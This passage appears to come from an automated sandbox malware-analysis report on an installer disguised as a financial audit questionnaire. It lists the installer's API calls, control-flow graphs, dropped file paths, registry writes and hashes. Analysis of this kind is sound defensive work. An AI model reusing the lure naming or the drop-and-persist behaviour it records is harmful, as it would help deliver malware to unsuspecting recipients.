                                                                                                    • Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, xrefs: 00402E29
                                                                                                    • Error launching installer, xrefs: 00402E0C
                                                                                                    • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                                                                    • soft, xrefs: 00402EAC
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                    • "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe", xrefs: 00402DC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe$soft
                                                                                                    • API String ID: 2803837635-3262142572
                                                                                                    • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                    • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                                                                    • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                    • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD
                                                                                                    APIs
                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4227406936-0
                                                                                                    • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                    • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                    • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                    • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 811 405234-405249 812 405300-405304 811->812 813 40524f-405260 811->813 814 405262-405266 call 405fae 813->814 815 40526b-405277 lstrlenW 813->815 814->815 817 405294-405298 815->817 818 405279-405289 lstrlenW 815->818 820 4052a7-4052ab 817->820 821 40529a-4052a1 SetWindowTextW 817->821 818->812 819 40528b-40528f lstrcatW 818->819 819->817 822 4052f1-4052f3 820->822 823 4052ad-4052ef SendMessageW * 3 820->823 821->820 822->812 824 4052f5-4052f8 822->824 823->822 824->812
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                    • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll), ref: 004052A1
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll
                                                                                                    • API String ID: 2531174081-3253533393
                                                                                                    • Opcode ID: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                                                                    • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                                                                    • Opcode Fuzzy Hash: 72a424387536e7fd81286c5d7774de893809cef09252ba040d9bce7e68552ecb
                                                                                                    • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 825 4024ee-4024f1 826 4024f3-40250a call 402b1d 825->826 827 40250c-402510 825->827 834 40254d-402550 826->834 829 402512-40253c call 402b3a WideCharToMultiByte lstrlenA 827->829 830 40253e-40254b call 402b3a lstrlenW 827->830 829->834 830->834 837 402793-4029d6 834->837 838 402556-402568 call 405eec WriteFile 834->838 838->837
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                    • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                    • String ID: 8$C:\Users\user\AppData\Local\Temp\nshE0D4.tmp$C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll
                                                                                                    • API String ID: 1453599865-3107661304
                                                                                                    • Opcode ID: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                                                                    • Instruction ID: d62a850ae7ae8d252436c59f910a95d891cc4c78108d860f1a787b3ec39cc5b5
                                                                                                    • Opcode Fuzzy Hash: 125d7d9e08fef2fde7f67e3546db7d8161a1fb5accdb6f6421c548297d33fbc9
                                                                                                    • Instruction Fuzzy Hash: 6A01B971A44204FFD700AFB09E89EAF7278EF51719F20043BB102B61D1C2BC4D41962D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 844 402573-402588 call 402b1d 847 4029c7-4029ca 844->847 848 40258e-402595 844->848 851 4029d0-4029d6 847->851 849 402597 848->849 850 40259a-40259d 848->850 849->850 852 4025a3-4025b2 call 405eec 850->852 853 4026e6-4026ee 850->853 852->853 857 4025b8 852->857 853->847 858 4025be-4025c2 857->858 859 402657-402667 call 405c7b 858->859 860 4025c8-4025e3 ReadFile 858->860 859->853 865 402669 859->865 860->853 862 4025e9-4025ee 860->862 862->853 864 4025f4-402602 862->864 866 4026a2-4026ae call 405ed3 864->866 867 402608-40261a MultiByteToWideChar 864->867 868 40266c-40266f 865->868 866->851 867->865 870 40261c-40261f 867->870 868->866 871 402671-402676 868->871 873 402621-40262c 870->873 874 4026b3-4026b7 871->874 875 402678-40267d 871->875 873->868 876 40262e-402653 SetFilePointer MultiByteToWideChar 873->876 879 4026d4-4026e0 SetFilePointer 874->879 880 4026b9-4026bd 874->880 875->874 878 40267f-402692 875->878 876->873 877 402655 876->877 877->865 878->853 883 402694-40269a 878->883 879->853 881 4026c5-4026d2 880->881 882 4026bf-4026c3 880->882 881->853 882->879 882->881 883->858 884 4026a0 883->884 884->853
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                                                                      • Part of subcall function 00405C7B: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                    • String ID: 9
                                                                                                    • API String ID: 1149667376-2366072709
                                                                                                    • Opcode ID: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                                                                    • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                                                                    • Opcode Fuzzy Hash: 9ac049d87795fdbdd4925ee5a5299b82ae141eed6358a2296866a4b192fc1822
                                                                                                    • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 885 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 892 4029c7-4029d6 885->892 893 40237d-402385 885->893 895 402387-402394 call 402b3a lstrlenW 893->895 896 402398-40239b 893->896 895->896 899 4023ab-4023ae 896->899 900 40239d-4023aa call 402b1d 896->900 901 4023b0-4023ba call 403062 899->901 902 4023bf-4023d3 RegSetValueExW 899->902 900->899 901->902 906 4023d5 902->906 907 4023d8-4024b2 RegCloseKey 902->907 906->907 907->892 910 402793-40279a 907->910 910->892
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nshE0D4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp
                                                                                                    • API String ID: 1356686001-3012521967
                                                                                                    • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                    • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                                                                    • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                    • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 911 4015b9-4015cd call 402b3a call 405a82 916 401614-401617 911->916 917 4015cf-4015eb call 405a04 CreateDirectoryW 911->917 919 401646-402197 call 401423 916->919 920 401619-401638 call 401423 call 405f8c SetCurrentDirectoryW 916->920 925 40160a-401612 917->925 926 4015ed-4015f8 GetLastError 917->926 933 402793-40279a 919->933 934 4029c7-4029d6 919->934 920->934 935 40163e-401641 920->935 925->916 925->917 930 401607 926->930 931 4015fa-401605 GetFileAttributesW 926->931 930->925 931->925 931->930 933->934 935->934
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 00405A90
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145,?,00000000,000000F0), ref: 00401630
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145, xrefs: 00401623
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145
                                                                                                    • API String ID: 3751793516-1892652693
                                                                                                    • Opcode ID: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                                                                    • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
                                                                                                    • Opcode Fuzzy Hash: 01d63cdc09ef030b798e24d03bab5c024d458686720c62c168a7b1a6a2e3207e
                                                                                                    • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 938 402b7a-402ba3 RegOpenKeyExW 939 402ba5-402bb0 938->939 940 402c0e-402c12 938->940 941 402bcb-402bdb RegEnumKeyW 939->941 942 402bb2-402bb5 941->942 943 402bdd-402bef RegCloseKey call 4062f6 941->943 945 402c02-402c05 RegCloseKey 942->945 946 402bb7-402bc9 call 402b7a 942->946 950 402bf1-402c00 943->950 951 402c15-402c1b 943->951 948 402c0b-402c0d 945->948 946->941 946->943 948->940 950->940 951->948 953 402c1d-402c2b RegDeleteKeyW 951->953 953->948 955 402c2d 953->955 955->940
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                                                                    • Instruction ID: 973325e0aa9a645a651b6ee30753ebbcc0ecd75d5609573519e3086a48bf95c6
                                                                                                    • Opcode Fuzzy Hash: b609a681d442e7482c58967ee8632616faae616d75f86d849c2a2114115373ce
                                                                                                    • Instruction Fuzzy Hash: 31113A71904008FEEF229F90DE89EAE3B79FB54348F104476FA05B11A0D3B59E51EA69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 956 10001759-10001795 call 10001b18 960 100018a6-100018a8 956->960 961 1000179b-1000179f 956->961 962 100017a1-100017a7 call 10002286 961->962 963 100017a8-100017b5 call 100022d0 961->963 962->963 968 100017e5-100017ec 963->968 969 100017b7-100017bc 963->969 970 1000180c-10001810 968->970 971 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 968->971 972 100017d7-100017da 969->972 973 100017be-100017bf 969->973 974 10001812-1000184c call 100015b4 call 100024a9 970->974 975 1000184e-10001854 call 100024a9 970->975 996 10001855-10001859 971->996 972->968 976 100017dc-100017dd call 10002b5f 972->976 978 100017c1-100017c2 973->978 979 100017c7-100017c8 call 100028a4 973->979 974->996 975->996 990 100017e2 976->990 985 100017c4-100017c5 978->985 986 100017cf-100017d5 call 10002645 978->986 987 100017cd 979->987 985->968 985->979 995 100017e4 986->995 987->990 990->995 995->968 1000 10001896-1000189d 996->1000 1001 1000185b-10001869 call 1000246c 996->1001 1000->960 1003 1000189f-100018a0 GlobalFree 1000->1003 1006 10001881-10001888 1001->1006 1007 1000186b-1000186e 1001->1007 1003->960 1006->1000 1009 1000188a-10001895 call 1000153d 1006->1009 1007->1006 1008 10001870-10001878 1007->1008 1008->1006 1010 1000187a-1000187b FreeLibrary 1008->1010 1009->1000 1010->1006
                                                                                                    APIs
                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
